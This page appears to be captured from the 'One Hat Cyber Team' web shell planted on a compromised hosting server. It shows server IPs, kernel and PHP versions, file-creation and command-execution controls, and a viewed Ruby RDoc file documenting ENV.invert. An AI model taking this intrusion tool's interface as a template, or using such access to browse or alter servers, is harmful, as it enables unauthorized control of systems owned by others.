⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
ri
/
3.0.0
/
system
/
ENV
/
View File Name :
invert-c.ri
U:RDoc::AnyMethod[iI"invert:ETI"ENV::invert;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"3Returns a Hash whose keys are the ENV values, ;TI"6and whose values are the corresponding ENV names:;To:RDoc::Markup::Verbatim; [I"-ENV.replace('foo' => '0', 'bar' => '1') ;TI".ENV.invert # => {"1"=>"bar", "0"=>"foo"} ;T:@format0o; ; [I":For a duplicate ENV value, overwrites the hash entry:;To;; [I"-ENV.replace('foo' => '0', 'bar' => '0') ;TI""ENV.invert # => {"0"=>"foo"} ;T;0o; ; [I"@Note that the order of the ENV processing is OS-dependent, ;TI"Ewhich means that the order of overwriting is also OS-dependent. ;TI";See {About Ordering}[#class-ENV-label-About+Ordering].;T: @fileI"hash.c;T:0@omit_headings_from_table_of_contents_below0I",ENV.invert -> hash of value/name pairs ;T0[ I"();T@FI"ENV;TcRDoc::NormalClass00